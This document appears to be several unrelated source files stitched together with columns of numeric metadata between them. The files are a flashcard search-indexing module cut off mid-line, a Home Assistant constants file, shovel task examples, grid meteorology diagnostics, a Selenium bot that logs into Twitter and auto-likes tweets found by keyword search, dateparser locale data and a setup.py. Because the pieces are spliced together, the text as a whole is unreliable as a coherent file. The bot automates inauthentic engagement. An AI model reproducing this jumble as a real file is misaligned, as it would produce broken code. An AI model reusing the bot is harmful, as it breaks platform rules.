card.tags] doc = search.Document( doc_id=_card2docid(card), fields=[ search.AtomField(name='doc_version', value=CARD_DOCUMENT_VERSION), search.AtomField(name='user_key', value=card.user_key.urlsafe()), # TODO(chris): is user_nickname always a direct-match # shortname, e.g., @chris? search.AtomField(name='user_nickname', value=card.user_nickname), # TODO(chris): support HtmlField for richer cards? 
search.TextField(name='front', value=card.front), search.TextField(name='back', value=card.back), search.TextField(name='info', value=card.info), search.DateField(name='added', value=card.added), search.DateField(name='modified', value=card.modified), search.AtomField(name='source_url', value=card.source_url), search.AtomField(name='private', value="1" if card.private else "0"), ] + tag_fields) return doc def _card2docid(card): # We set the search.Document's ID to the entity key it mirrors. return card.key.urlsafe() def _sanitize_user_input(query_str): # The search API puts special meaning on certain inputs and we # don't want to expose the internal query language to users so # we strictly restrict inputs. The rules are: # # Allowed characters for values are [a-zA-Z0-9._-]. # @name is removed and 'name' values returned as a list. # #tag is removed and 'tag' values returned as a list. terms, names, tags = [], [], [] for token in query_str.split(): # TODO(chris): allow international characters. sane_token = re.sub(r'[^a-zA-Z0-9._-]+', '', token) if sane_token: if sane_token in ('AND', 'OK'): continue # ignore special search keywords elif token.startswith('@'): names.append(sane_token) elif token.startswith('#'): tags.append(sane_token) else: terms.append(sane_token) return terms, names, tags class _QueryProcessor(object): """Simple queries, possibly with @name and #tag tokens. name_field is the field @name tokens should apply to. tag_field is the name of the field #tag tokens should apply to. """ def __init__(self, query_str, name_field, tag_field, private_field, user_key_field, query_options=None, user_key=None): self.query_str = query_str self.name_field = name_field self.tag_field = tag_field self.private_field = private_field self.user_key_field = user_key_field self.query_options = query_options self.user_key = user_key def _sanitize_user_input(self): query_str = self.query_str[:MAX_QUERY_LEN] return _sanitize_user_input(query_str) def _build_query_string(self): terms, names, tags = self._sanitize_user_input() # Our simply query logic is to OR together all terms from the # user, then AND in the name or tag filters (plus a privacy clause). parts = [] if terms: parts.append(' OR '.join(terms)) if names: parts.append('%s: (%s)' % (self.name_field, ' OR '.join(names))) if tags: parts.append('%s: (%s)' % (self.tag_field, ' OR '.join(tags))) # Don't return cards that other users have marked private... privacy = '%s: 0' % self.private_field if self.user_key: # ... but always show the user their own cards in results. privacy += ' OR %s: (%s)' % (self.user_key_field, self.user_key) parts.append('(' + privacy + ')') return ' AND '.join(parts) def query(self): query = search.Query( query_string=self._build_query_string(), options=self.query_options) return query
37.035714
81
0.667998
993
7,259
4.728097
0.277946
0.025346
0.024281
0.012141
0.083493
0.034292
0.021086
0
0
0
0
0.005597
0.236947
7,259
195
82
37.225641
0.842029
0.402673
0
0.05
0
0
0.045155
0
0
0
0
0.010256
0.01
1
0.1
false
0
0.03
0.01
0.21
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
d5e30ec5517ff0e5f54798d022557ddc8306de32
445
py
Python
custom_components/vaddio_conferenceshot/const.py
rohankapoorcom/vaddio_conferenceshot
71744710df10f77e21e9e7568e3f6c7175b0d11d
[ "Apache-2.0" ]
null
null
null
custom_components/vaddio_conferenceshot/const.py
rohankapoorcom/vaddio_conferenceshot
71744710df10f77e21e9e7568e3f6c7175b0d11d
[ "Apache-2.0" ]
null
null
null
custom_components/vaddio_conferenceshot/const.py
rohankapoorcom/vaddio_conferenceshot
71744710df10f77e21e9e7568e3f6c7175b0d11d
[ "Apache-2.0" ]
null
null
null
import voluptuous as vol

import homeassistant.helpers.config_validation as cv
from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_PATH, CONF_USERNAME

DOMAIN = "vaddio_conferenceshot"

DATA_SCHEMA = vol.Schema(
    {
        vol.Required(CONF_HOST): cv.string,
        vol.Required(CONF_USERNAME): cv.string,
        vol.Required(CONF_PASSWORD): cv.string,
    }
)

SERVICE_RECALL_PRESET = "move_to_preset"
ATTR_PRESET_ID = "preset"
24.722222
82
0.750562
58
445
5.482759
0.517241
0.103774
0.141509
0.119497
0.144654
0
0
0
0
0
0
0
0.161798
445
17
83
26.176471
0.852547
0
0
0
0
0
0.092135
0.047191
0
0
0
0
0
1
0
false
0.153846
0.230769
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5e4c8d6143747e9fa0113815e838834d857b208
1,022
py
Python
example/shovel/bar.py
demiurgestudios/shovel
3db497164907d3765fae182959147d19064671c7
[ "MIT" ]
202
2015-01-12T13:47:29.000Z
2022-02-09T19:13:36.000Z
example/shovel/bar.py
demiurgestudios/shovel
3db497164907d3765fae182959147d19064671c7
[ "MIT" ]
14
2017-04-09T17:04:53.000Z
2021-05-16T11:08:34.000Z
example/shovel/bar.py
demiurgestudios/shovel
3db497164907d3765fae182959147d19064671c7
[ "MIT" ]
22
2015-09-11T18:35:10.000Z
2021-05-16T11:04:56.000Z
from shovel import task


@task
def hello(name='Foo'):
    '''Prints "Hello, " followed by the provided name.

    Examples:
        shovel bar.hello
        shovel bar.hello --name=Erin
        http://localhost:3000/bar.hello?Erin'''
    print('Hello, %s' % name)


@task
def args(*args):
    '''Echoes back all the args you give it.

    This exists mostly to demonstrate the fact that shovel is
    compatible with variable argument functions.

    Examples:
        shovel bar.args 1 2 3 4
        http://localhost:3000/bar.args?1&2&3&4'''
    for arg in args:
        print('You said "%s"' % arg)


@task
def kwargs(**kwargs):
    '''Echoes back all the kwargs you give it.

    This exists mostly to demonstrate that shovel is compatible
    with keyword argument functions.

    Examples:
        shovel bar.kwargs --foo=5 --bar 5 --howdy hey
        http://localhost:3000/bar.kwargs?foo=5&bar=5&howdy=hey'''
    for key, val in kwargs.items():
        print('You said "%s" => "%s"' % (key, val))
27.621622
65
0.614481
148
1,022
4.243243
0.385135
0.057325
0.08121
0.095541
0.417197
0.235669
0.200637
0.200637
0
0
0
0.031788
0.261252
1,022
37
66
27.621622
0.8
0.619374
0
0.25
0
0
0.154362
0
0
0
0
0
0
1
0.25
false
0
0.083333
0
0.333333
0.25
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
d5eff585130a0defb51fd844556d3dea1143c55d
18,862
py
Python
src/ucar/unidata/idv/resources/python/griddiag.py
JessicaWiedemeier/IDV
e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64
[ "CNRI-Jython" ]
1
2021-06-09T11:24:48.000Z
2021-06-09T11:24:48.000Z
src/ucar/unidata/idv/resources/python/griddiag.py
JessicaWiedemeier/IDV
e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64
[ "CNRI-Jython" ]
null
null
null
src/ucar/unidata/idv/resources/python/griddiag.py
JessicaWiedemeier/IDV
e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64
[ "CNRI-Jython" ]
null
null
null
""" This is the doc for the Grid Diagnostics module. These functions are based on the grid diagnostics from the GEneral Meteorological PAcKage (GEMPAK). Note that the names are case sensitive and some are named slightly different from GEMPAK functions to avoid conflicts with Jython built-ins (e.g. str). <P> In the following operators, scalar operands are named S<sub>n</sub> and vector operands are named V<sub>n</sub>. Lowercase u and v refer to the grid relative components of a vector. """ def GRAVITY(): """ Gravity constant """ return DerivedGridFactory.GRAVITY; # Math functions def atn2(S1,S2,WA=0): """ Wrapper for atan2 built-in <div class=jython> ATN2 (S1, S2) = ATAN ( S1 / S2 )<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.atan2(S1,S2,WA) def add(S1,S2,WA=0): """ Addition <div class=jython> ADD (S1, S2) = S1 + S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.add(S1,S2,WA) def mul(S1,S2,WA=0): """ Multiply <div class=jython> MUL (S1, S2) = S1 * S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.multiply(S1,S2,WA) def quo(S1,S2,WA=0): """ Divide <div class=jython> QUO (S1, S2) = S1 / S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.divide(S1,S2,WA) def sub(S1,S2,WA=0): """ Subtract <div class=jython> SUB (S1, S2) = S1 - S2<br> WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR) </div> """ return GridMath.subtract(S1,S2,WA) # Scalar quantities def adv(S,V): """ Horizontal Advection, negative by convention <div class=jython> ADV ( S, V ) = - ( u * DDX (S) + v * DDY (S) ) </div> """ return -add(mul(ur(V),ddx(S)),mul(vr(V),ddy(S))) def avg(S1,S2): """ Average of 2 scalars <div class=jython> AVG (S1, S2) = ( S1 + S2 ) / 2 </div> """ return add(S1,S2)/2 def avor(V): """ Absolute Vorticity <div class=jython> AVOR ( V ) = VOR ( V ) + CORL(V) </div> """ relv = vor(V) return add(relv,corl(relv)) def circs(S, D=2): """ <div class=jython> Apply a circular aperature smoothing to the grid points. The weighting function is the circular aperature diffraction function. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "CIRC", int(D)) def corl(S): """ Coriolis Parameter for all points in a grid <div class=jython> CORL = TWO_OMEGA*sin(latr) </div> """ return DerivedGridFactory.createCoriolisGrid(S) def cress(S, D=2): """ <div class=jython> Apply a Cressman smoothing to the grid points. The smoothed value is given by a weighted average of surrounding grid points. D is the radius of influence in grid increments, increasing D increases the smoothing. 
(default D=2) </div> """ return GridUtil.smooth(S, "CRES", int(D)) def cros(V1,V2): """ Vector cross product magnitude <div class=jython> CROS ( V1, V2 ) = u1 * v2 - u2 * v1 </div> """ return sub(mul(ur(V1),vr(V2)),mul(ur(V2),vr(V1))) def ddx(S): """ Take the derivative with respect to the domain's X coordinate """ return GridMath.ddx(S); def ddy(S): """ Take the derivative with respect to the domain's Y coordinate """ return GridMath.ddy(S); def defr(V): """ Total deformation <div class=jython> DEF ( V ) = ( STRD (V) ** 2 + SHR (V) ** 2 ) ** .5 </div> """ return mag(strd(V),shr(V)) def div(V): """ Horizontal Divergence <div class=jython> DIV ( V ) = DDX ( u ) + DDY ( v ) </div> """ return add(ddx(ur(V)),ddy(vr(V))) def dirn(V): """ North relative direction of a vector <div class=jython> DIRN ( V ) = DIRR ( un(v), vn(v) ) </div> """ return dirr(DerivedGridFactory.createTrueFlowVector(V)) def dirr(V): """ Grid relative direction of a vector """ return DerivedGridFactory.createVectorDirection(V) def dot(V1,V2): """ Vector dot product <div class=jython> DOT ( V1, V2 ) = u1 * u2 + v1 * v2 </div> """ product = mul(V1,V2) return add(ur(product),vr(product)) def gwfs(S, N=6): """ <div class=jython> Horizontal smoothing using normally distributed weights with theoretical response of 1/e for N * delta-x wave. Increasing N increases the smoothing. (default N=6) </div> """ return GridUtil.smooth(S, "GWFS", int(N)) def jcbn(S1,S2): """ Jacobian Determinant <div class=jython> JCBN ( S1, S2 ) = DDX (S1) * DDY (S2) - DDY (S1) * DDX (S2) </div> """ return sub(mul(ddx(S1),ddy(S2)),mul(ddy(S1),ddx(S2))) def latr(S): """ Latitudue all points in a grid """ return DerivedGridFactory.createLatitudeGrid(S) def lap(S): """ Laplacian operator <div class=jython> LAP ( S ) = DIV ( GRAD (S) ) </div> """ grads = grad(S) return div(grads) def lav(S,level1=None,level2=None, unit=None): """ Layer Average of a multi layer grid <div class=jython> LAV ( S ) = ( S (level1) + S (level2) ) / 2. </div> """ if level1 == None: return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_AVERAGE) else: return layerAverage(S,level1,level2, unit) def ldf(S,level1,level2, unit=None): """ Layer Difference <div class=jython> LDF ( S ) = S (level1) - S (level2) </div> """ return layerDiff(S,level1,level2, unit); def mag(*a): """ Magnitude of a vector """ if (len(a) == 1): return DerivedGridFactory.createVectorMagnitude(a[0]); else: return DerivedGridFactory.createVectorMagnitude(a[0],a[1]); def mixr(temp,rh): """ Mixing Ratio from Temperature, RH (requires pressure domain) """ return DerivedGridFactory.createMixingRatio(temp,rh) def relh(temp,mixr): """ Create Relative Humidity from Temperature, mixing ratio (requires pressure domain) """ return DerivedGridFactory.createRelativeHumidity(temp,mixr) def pvor(S,V): """ Potetial Vorticity (usually from theta and wind) """ return DerivedGridFactory.createPotentialVorticity(S,V) def rects(S, D=2): """ <div class=jython> Apply a rectangular aperature smoothing to the grid points. The weighting function is the product of the rectangular aperature diffraction function in the x and y directions. D is the radius of influence in grid increments, increasing D increases the smoothing. 
(default D=2) </div> """ return GridUtil.smooth(S, "RECT", int(D)) def savg(S): """ Average over whole grid <div class=jython> SAVG ( S ) = average of all non-missing grid point values </div> """ return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE) def savs(S): """ Average over grid subset <div class=jython> SAVS ( S ) = average of all non-missing grid point values in the subset area </div> """ return savg(S) def sdiv(S,V): """ Horizontal Flux Divergence <div class=jython> SDIV ( S, V ) = S * DIV ( V ) + DOT ( V, GRAD ( S ) ) </div> """ return add(mul(S,(div(V))) , dot(V,grad(S))) def shr(V): """ Shear Deformation <div class=jython> SHR ( V ) = DDX ( v ) + DDY ( u ) </div> """ return add(ddx(vr(V)),ddy(ur(V))) def sm5s(S): """ Smooth a scalar grid using a 5-point smoother <div class=jython> SM5S ( S ) = .5 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) + S (i-1,j) + S (i,j-1) ) </div> """ return GridUtil.smooth(S, "SM5S") def sm9s(S): """ Smooth a scalar grid using a 9-point smoother <div class=jython> SM9S ( S ) = .25 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) + S (i-1,j) + S (i,j-1) ) + .0625 * ( S (i+1,j+1) + S (i+1,j-1) + S (i-1,j+1) + S (i-1,j-1) ) </div> """ return GridUtil.smooth(S, "SM9S") def strd(V): """ Stretching Deformation <div class=jython> STRD ( V ) = DDX ( u ) - DDY ( v ) </div> """ return sub(ddx(ur(V)),ddy(vr(V))) def thta(temp): """ Potential Temperature from Temperature (requires pressure domain) """ return DerivedGridFactory.createPotentialTemperature(temp) def thte(temp,rh): """ Equivalent Potential Temperature from Temperature and Relative humidity (requires pressure domain) """ return DerivedGridFactory.createEquivalentPotentialTemperature(temp,rh) def un(V): """ North relative u component """ return ur(DerivedGridFactory.createTrueFlowVector(V)) def ur(V): """ Grid relative u component """ return DerivedGridFactory.getUComponent(V) def vn(V): """ North relative v component """ return vr(DerivedGridFactory.createTrueFlowVector(V)) def vor(V): """ Relative Vorticity <div class=jython> VOR ( V ) = DDX ( v ) - DDY ( u ) </div> """ return sub(ddx(vr(V)),ddy(ur(V))) def vr(V): """ Grid relative v component """ return DerivedGridFactory.getVComponent(V) def xav(S): """ Average along a grid row <div class=jython> XAV (S) = ( S (X1) + S (X2) + ... + S (KXD) ) / KNT KXD = number of points in row KNT = number of non-missing points in row XAV for a row is stored at every point in that row. </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_X) def xsum(S): """ Sum along a grid row <div class=jython> XSUM (S) = ( S (X1) + S (X2) + ... + S (KXD) ) KXD = number of points in row XSUM for a row is stored at every point in that row. </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_X) def yav(S): """ Average along a grid column <div class=jython> YAV (S) = ( S (Y1) + S (Y2) + ... + S (KYD) ) / KNT KYD = number of points in column KNT = number of non-missing points in column </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_Y) def ysum(S): """ Sum along a grid column <div class=jython> YSUM (S) = ( S (Y1) + S (Y2) + ... + S (KYD) ) KYD = number of points in row YSUM for a column is stored at every point in that column. </div> """ return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_Y) def zav(S): """ Average across the levels of a grid at all points <div class=jython> ZAV (S) = ( S (Z1) + S (Z2) + ... 
+ S (KZD) ) / KNT KZD = number of levels KNT = number of non-missing points in column </div> """ return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE) def zsum(S): """ Sum across the levels of a grid at all points <div class=jython> ZSUM (S) = ( S (Z1) + S (Z2) + ... + S (KZD) ) KZD = number of levels ZSUM for a vertical column is stored at every point </div> """ return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_SUM) def wshr(V, Z, top, bottom): """ Magnitude of the vertical wind shear in a layer <div class=jython> WSHR ( V ) = MAG [ VLDF (V) ] / LDF (Z) </div> """ dv = mag(vldf(V,top,bottom)) dz = ldf(Z,top,bottom) return quo(dv,dz) # Vector output def age(obs,geo): """ Ageostrophic wind <div class=jython> AGE ( S ) = [ u (OBS) - u (GEO(S)), v (OBS) - v (GEO(S)) ] </div> """ return sub(obs,geo) def circv(S, D=2): """ <div class=jython> Apply a circular aperature smoothing to the grid points. The weighting function is the circular aperature diffraction function. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "CIRC", int(D)) def cresv(S, D=2): """ <div class=jython> Apply a Cressman smoothing to the grid points. The smoothed value is given by a weighted average of surrounding grid points. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "CRES", int(D)) def dvdx(V): """ Partial x derivative of a vector <div class=jython> DVDX ( V ) = [ DDX (u), DDX (v) ] </div> """ return vecr(ddx(ur(V)), ddx(vr(V))) def dvdy(V): """ Partial x derivative of a vector <div class=jython> DVDY ( V ) = [ DDY (u), DDY (v) ] </div> """ return vecr(ddy(ur(V)), ddy(vr(V))) def frnt(S,V): """ Frontogenesis function from theta and the wind <div class=jython> FRNT ( THTA, V ) = 1/2 * MAG ( GRAD (THTA) ) * ( DEF * COS (2 * BETA) - DIV ) <p> Where: BETA = ASIN ( (-DDX (THTA) * COS (PSI) <br> - DDY (THTA) * SIN (PSI))/ <br> MAG ( GRAD (THTA) ) ) <br> PSI = 1/2 ATAN2 ( SHR / STR ) <br> </div> """ shear = shr(V) strch = strd(V) psi = .5*atn2(shear,strch) dxt = ddx(S) dyt = ddy(S) cosd = cos(psi) sind = sin(psi) gradt = grad(S) mgradt = mag(gradt) a = -cosd*dxt-sind*dyt beta = asin(a/mgradt) frnto = .5*mgradt*(defr(V)*cos(2*beta)-div(V)) return frnto def geo(z): """ geostrophic wind from height <div class=jython> GEO ( S ) = [ - DDY (S) * const / CORL, DDX (S) * const / CORL ] </div> """ return DerivedGridFactory.createGeostrophicWindVector(z) def grad(S): """ Gradient of a scalar <div class=jython> GRAD ( S ) = [ DDX ( S ), DDY ( S ) ] </div> """ return vecr(ddx(S),ddy(S)) def gwfv(V, N=6): """ <div class=jython> Horizontal smoothing using normally distributed weights with theoretical response of 1/e for N * delta-x wave. Increasing N increases the smoothing. (default N=6) </div> """ return gwfs(V, N) def inad(V1,V2): """ Inertial advective wind <div class=jython> INAD ( V1, V2 ) = [ DOT ( V1, GRAD (u2) ), DOT ( V1, GRAD (v2) ) ] </div> """ return vecr(dot(V1,grad(ur(V2))),dot(V1,grad(vr(V2)))) def qvec(S,V): """ Q-vector at a level ( K / m / s ) <div class=jython> QVEC ( S, V ) = [ - ( DOT ( DVDX (V), GRAD (S) ) ), - ( DOT ( DVDY (V), GRAD (S) ) ) ] where S can be any thermal paramenter, usually THTA. 
</div> """ grads = grad(S) qvecu = newName(-dot(dvdx(V),grads),"qvecu") qvecv = newName(-dot(dvdy(V),grads),"qvecv") return vecr(qvecu,qvecv) def qvcl(THTA,V): """ Q-vector ( K / m / s ) <div class=jython> QVCL ( THTA, V ) = ( 1/( D (THTA) / DP ) ) * [ ( DOT ( DVDX (V), GRAD (THTA) ) ), ( DOT ( DVDY (V), GRAD (THTA) ) ) ] </div> """ dtdp = GridMath.partial(THTA,2) gradt = grad(THTA) qvecudp = newName(quo(dot(dvdx(V),gradt),dtdp),"qvecudp") qvecvdp = newName(quo(dot(dvdy(V),gradt),dtdp),"qvecvdp") return vecr(qvecudp,qvecvdp) def rectv(S, D=2): """ <div class=jython> Apply a rectangular aperature smoothing to the grid points. The weighting function is the product of the rectangular aperature diffraction function in the x and y directions. D is the radius of influence in grid increments, increasing D increases the smoothing. (default D=2) </div> """ return GridUtil.smooth(S, "RECT", int(D)) def sm5v(V): """ Smooth a scalar grid using a 5-point smoother (see sm5s) """ return sm5s(V) def sm9v(V): """ Smooth a scalar grid using a 9-point smoother (see sm9s) """ return sm9s(V) def thrm(S, level1, level2, unit=None): """ Thermal wind <div class=jython> THRM ( S ) = [ u (GEO(S)) (level1) - u (GEO(S)) (level2), v (GEO(S)) (level1) - v (GEO(S)) (level2) ] </div> """ return vldf(geo(S),level1,level2, unit) def vadd(V1,V2): """ add the components of 2 vectors <div class=jython> VADD (V1, V2) = [ u1+u2, v1+v2 ] </div> """ return add(V1,V2) def vecn(S1,S2): """ Make a true north vector from two components <div class=jython> VECN ( S1, S2 ) = [ S1, S2 ] </div> """ return makeTrueVector(S1,S2) def vecr(S1,S2): """ Make a vector from two components <div class=jython> VECR ( S1, S2 ) = [ S1, S2 ] </div> """ return makeVector(S1,S2) def vlav(V,level1,level2, unit=None): """ calculate the vector layer average <div class=jython> VLDF(V) = [(u(level1) - u(level2))/2, (v(level1) - v(level2))/2] </div> """ return layerAverage(V, level1, level2, unit) def vldf(V,level1,level2, unit=None): """ calculate the vector layer difference <div class=jython> VLDF(V) = [u(level1) - u(level2), v(level1) - v(level2)] </div> """ return layerDiff(V,level1,level2, unit) def vmul(V1,V2): """ Multiply the components of 2 vectors <div class=jython> VMUL (V1, V2) = [ u1*u2, v1*v2 ] </div> """ return mul(V1,V2) def vquo(V1,V2): """ Divide the components of 2 vectors <div class=jython> VQUO (V1, V2) = [ u1/u2, v1/v2 ] </div> """ return quo(V1,V2) def vsub(V1,V2): """ subtract the components of 2 vectors <div class=jython> VSUB (V1, V2) = [ u1-u2, v1-v2 ] </div> """ return sub(V1,V2) def LPIndex(u, v, z, t, top, bottom, unit): """ calculate the wind shear between discrete layers <div class=jython> LP = 7.268DUDZ + 0.718DTDN + 0.318DUDN - 2.52 </div> """ Z = windShear(u, v, z, top, bottom, unit)*7.268 uwind = getSliceAtLevel(u, top) vwind = getSliceAtLevel(v, top) temp = newUnit(getSliceAtLevel(t, top), "temperature", "celsius") HT = sqrt(ddx(temp)*ddx(temp) + ddy(temp)*ddy(temp))*0.718 HU = (ddx(vwind) + ddy(uwind))*0.318 L = add(noUnit(Z), add(noUnit(HU), noUnit(HT))) L = (L - 2.520)*(-0.59) P= 1.0/(1.0 + GridMath.applyFunctionOverGridsExt(L,"exp")) LP = setLevel(P ,top, unit) return LP def EllrodIndex(u, v, z, top, bottom, unit): """ calculate the wind shear between discrete layers <div class=jython> EI = VWS X ( DEF + DIV) </div> """ VWS = windShear(u, v, z, top, bottom, unit)*100.0 # uwind = getSliceAtLevel(u, top) vwind = getSliceAtLevel(v, top) DIV = (ddx(uwind) + ddy(vwind))* (-1.0) # DSH = ddx(vwind) + ddy(uwind) DST = 
ddx(uwind) - ddy(vwind) DEF = sqrt(DSH * DSH + DST * DST) EI = mul(noUnit(VWS), add(noUnit(DEF), noUnit(DIV))) return setLevel(EI, top, unit)
26.75461
89
0.584721
2,684
18,862
4.100596
0.152385
0.044339
0.077594
0.018808
0.494821
0.429675
0.404052
0.350809
0.320462
0.276576
0
0.024786
0.264182
18,862
704
90
26.792614
0.768211
0.590658
0
0.078431
0
0
0.012306
0
0
0
0
0
0
1
0.382353
false
0
0
0
0.77451
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
d5effb4acc4b4904be8e5099e47cd060230843fe
2,376
py
Python
app.py
DevilBit/Twitter-Bot
6f1b285aeb5faf37906d575775a927e69a5321d6
[ "MIT" ]
null
null
null
app.py
DevilBit/Twitter-Bot
6f1b285aeb5faf37906d575775a927e69a5321d6
[ "MIT" ]
null
null
null
app.py
DevilBit/Twitter-Bot
6f1b285aeb5faf37906d575775a927e69a5321d6
[ "MIT" ]
1
2021-03-08T20:05:23.000Z
2021-03-08T20:05:23.000Z
from selenium import webdriver  # to get the browser
from selenium.webdriver.common.keys import Keys  # to send keys to the browser
import getpass  # to get the password safely
import time  # to pause the program


# a class to store all twitter-related objects and functions
class twitter_bot:
    def __init__(self, username, password):
        self.username = username
        self.password = password
        self.bot = webdriver.Firefox()

    # login function
    def login(self):
        bot = self.bot
        bot.get('https://twitter.com/login')
        # sleep to wait for the browser to load the website
        time.sleep(3)
        email = bot.find_element_by_class_name('js-username-field')  # get the email field
        password = bot.find_element_by_class_name('js-password-field')  # get the password field
        # clear the email and password fields just in case of autofill
        email.clear()
        password.clear()
        # fill in the email field
        email.send_keys(self.username)
        time.sleep(2)
        # fill in the password field
        password.send_keys(self.password)
        time.sleep(2)
        # click the login button
        bot.find_element_by_class_name("EdgeButtom--medium").click()
        time.sleep(3)

    def like_tweet(self, search):
        bot = self.bot
        # use keyword to search
        bot.get('https://twitter.com/search?q=' + search + '&src=typd')
        bot.implicitly_wait(3)
        # get posts
        for i in range(0, 30):
            bot.execute_script('window.scrollTo(0, document.body.scrollHeight)')
            time.sleep(10)
        tweets = bot.find_elements_by_class_name('tweet')
        links = [element.get_attribute('data-permalink-path') for element in tweets]
        # like posts
        for link in links:
            bot.get('https://twitter.com/' + link)
            try:
                bot.find_element_by_class_name('HeartAnimation').click()
                time.sleep(10)
            except Exception as ex:
                time.sleep(60)


if __name__ == '__main__':
    username = input('Email: ')
    password = getpass.getpass('Password: ')
    search = input('Please enter keyword: ')

    user = twitter_bot(username, password)
    user.login()
    time.sleep(10)
    user.like_tweet(search)
34.941176
95
0.603114
295
2,376
4.718644
0.359322
0.051724
0.039511
0.045977
0.119971
0.074713
0.038793
0
0
0
0
0.010241
0.301347
2,376
67
96
35.462687
0.828313
0.170875
0
0.191489
0
0
0.140964
0.014308
0
0
0
0
0
1
0.06383
false
0.170213
0.085106
0
0.170213
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5fb061a3a4378d9720ff3a451d5983678f6ed08
2,712
py
Python
venv/lib/python3.8/site-packages/dateparser/data/date_translation_data/ebu.py
yuta-komura/vishnu
67173b674d5f4f3be189474103612447ef69ab44
[ "MIT" ]
1
2021-11-17T04:55:14.000Z
2021-11-17T04:55:14.000Z
dateparser/data/date_translation_data/ebu.py
cool-RR/dateparser
c38336df521cc57d947dc2c9111539a72f801652
[ "BSD-3-Clause" ]
null
null
null
dateparser/data/date_translation_data/ebu.py
cool-RR/dateparser
c38336df521cc57d947dc2c9111539a72f801652
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- info = { "name": "ebu", "date_order": "DMY", "january": [ "mweri wa mbere", "mbe" ], "february": [ "mweri wa kaĩri", "kai" ], "march": [ "mweri wa kathatũ", "kat" ], "april": [ "mweri wa kana", "kan" ], "may": [ "mweri wa gatano", "gat" ], "june": [ "mweri wa gatantatũ", "gan" ], "july": [ "mweri wa mũgwanja", "mug" ], "august": [ "mweri wa kanana", "knn" ], "september": [ "mweri wa kenda", "ken" ], "october": [ "mweri wa ikũmi", "iku" ], "november": [ "mweri wa ikũmi na ũmwe", "imw" ], "december": [ "mweri wa ikũmi na kaĩrĩ", "igi" ], "monday": [ "njumatatu", "tat" ], "tuesday": [ "njumaine", "ine" ], "wednesday": [ "njumatano", "tan" ], "thursday": [ "aramithi", "arm" ], "friday": [ "njumaa", "maa" ], "saturday": [ "njumamothii", "nmm" ], "sunday": [ "kiumia", "kma" ], "am": [ "ki" ], "pm": [ "ut" ], "year": [ "mwaka" ], "month": [ "mweri" ], "week": [ "kiumia" ], "day": [ "mũthenya" ], "hour": [ "ithaa" ], "minute": [ "ndagĩka" ], "second": [ "sekondi" ], "relative-type": { "1 year ago": [ "last year" ], "0 year ago": [ "this year" ], "in 1 year": [ "next year" ], "1 month ago": [ "last month" ], "0 month ago": [ "this month" ], "in 1 month": [ "next month" ], "1 week ago": [ "last week" ], "0 week ago": [ "this week" ], "in 1 week": [ "next week" ], "1 day ago": [ "ĩgoro" ], "0 day ago": [ "ũmũnthĩ" ], "in 1 day": [ "rũciũ" ], "0 hour ago": [ "this hour" ], "0 minute ago": [ "this minute" ], "0 second ago": [ "now" ] }, "locale_specific": {}, "skip": [ " ", ".", ",", ";", "-", "/", "'", "|", "@", "[", "]", "," ] }
15.859649
34
0.289823
188
2,712
4.170213
0.537234
0.107143
0.045918
0.035714
0
0
0
0
0
0
0
0.012559
0.530236
2,712
170
35
15.952941
0.602826
0.007743
0
0.248521
0
0
0.31759
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5fcff660972d9337742f70ae81e7f0f26eaadac
310
py
Python
setup.py
martinfarrow/awspk
c3b5f8ede44ca96473b95f52ddb2291a45828565
[ "MIT" ]
null
null
null
setup.py
martinfarrow/awspk
c3b5f8ede44ca96473b95f52ddb2291a45828565
[ "MIT" ]
null
null
null
setup.py
martinfarrow/awspk
c3b5f8ede44ca96473b95f52ddb2291a45828565
[ "MIT" ]
null
null
null
#!/usr/bin/env python3

from setuptools import setup, find_packages

setup(name='awspk',
      version='0.1',
      description='An aws cli pen knife with loads of interesting stuff',
      author='Martin Farrow',
      author_email='[email protected]',
      py_modules=['awspk'],
      license='LICENSE',
)
23.846154
71
0.651613
40
310
4.975
0.875
0
0
0
0
0
0
0
0
